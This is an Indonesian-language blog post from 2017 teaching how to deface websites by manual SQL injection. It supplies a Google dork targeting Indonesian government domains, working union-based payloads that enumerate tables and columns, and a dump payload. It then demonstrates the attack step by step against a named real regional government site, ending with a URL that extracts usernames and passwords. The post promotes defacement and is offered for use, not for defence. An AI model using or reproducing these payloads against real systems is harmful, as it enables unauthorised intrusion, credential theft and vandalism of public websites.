Tutorial deface metode SQLI Manual.

label
label
Hi,
Kembali lagi di blog we ini,kali ini we akan share cara deface metode SQL Injection Manual.



Pada tutorial ini saya akan menggunakan android,agak sedikit beda dengan exploit lain exploit kali ini di buat oleh Seorang defacer Bernickname Badut Galau dari team Cowok Tersakiti Team.

Pada dasarnya SQLI ada teknik deface yang sudah cukup lama,namun karna masih banyak situs pemerintahan indonesian yang terkena celah tersebut jadi we akan share tutorial nya.

Sebelum ke tutorialnya mari kita bahas apa itu deface.
Deface yang berdasarkan kamus UMUM berarti merusakkan; mencemarkan; menggoresi; menghapuskan tetapi arti kata deface disini yang sangat lekat adalah sebagai salah satu kegiatan merubah tampilan suatu website baik halaman utama atau index filenya ataupun halaman lain yang masih terkait dalam satu url dengan website tersebut (bisa di folder atau di file).
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer. Deface merupakan sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname mereka agar hasil kerjanya diketahui oleh khalayak hacker.
Pelaku peretasan deface sendiri dikenal dengan sebutan Defacer.



Persiapan Deface ;
  1. Dork : inurl:news.php?id= site:.go.id
  2. Exploit : concat(0x496e6a6563742062792062616475742067616c6175,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
  3. Exploit Dump : (select(@x)from(select(@x:=0x00),(select(@x)from(yang mau d buka)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,isi,0x203a3a20,isi))))x)
Langkah-langkah Deface ;
  • dorking ke google mengunakan dork yang sudah saya siapkan
  • Setelah selesai dorking silahkan pilih web sesuka kalian,jika tidak vuln cari web laen.(kali ini saya akan menggunakan web www.rajaampatkab.go.id)
  • Untuk mencari tau vulnnya bisa di tambahkan kode berikut: (')(")(*)(.)
  • Sebelum di tambahkan (')
  • sesudah di tambahkan tanda (')
  • Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” tanpa tanda kutip,bagaimana kita agar mengetahui jumlah table di database yaitu dengan cara melihat awal terjadinya error kembali.

Contoh

http://rajaampatkab.go.id/berita.php?id=205%27+order+by+1--+- Normal

http://rajaampatkab.go.id/berita.php?id=205%27+order+by+2--+- Normal

 http://rajaampatkab.go.id/berita.php?id=205%27+order+by+3--+- Normal

http://rajaampatkab.go.id/berita.php?id=205%27+order+by+13--+- Normal

http://rajaampatkab.go.id/berita.php?id=205%27+order+by+14--+- Error
Berarti jumlah kolom pada database nya ada 13 kolom 

  • Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injection / tempat kita memasukkan perintah-perintah selanjutnya.
  • Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda – di depan angka.
Contoh
http://rajaampatkab.go.id/berita.php?id=-205%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+-
Nanti akan ada angka ajaibnya(angka ajaib saya yaitu 2,4,7, dan 12).

  • Di langkah ini lah yang akan menentukan sukses atau ngak nya SQLi kita pada kali ini,untuk cara pemasangan exploit bisa di ikut contoh di bawah ini.
http://rajaampatkab.go.id/berita.php?id=-205'union+select+1,2,3,concat(0x496e6a6563742062792062616475742067616c6175,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),5,6,7,8,9,10,11,12,13--+-

Pemasangan exploit di letakan di letak angka ajaib yang kita temukan(saya memasang di angka 4).

  • Disini kita akan menemukan Username dan password dari situs yang ingin kita deface,kali ini saya akan DUMP menggunakan DUMP yg sudah saya berikan.
Isi (yg mau di buka)dengan table sebelah kiri sedangkan (isi) di isi dengan table sblh kanan.

Sebagai contoh ;
 http://rajaampatkab.go.id/berita.php?id=-205%27+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(select(@x)from(users)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),5,6,7,8,9,10,11,12,13--+-

Bye teman-teman




  • - Banjarmasin , 4 Desember 2017

Share This :

Related Post

This comment has been removed by the author.



sentiment_satisfied Emoticon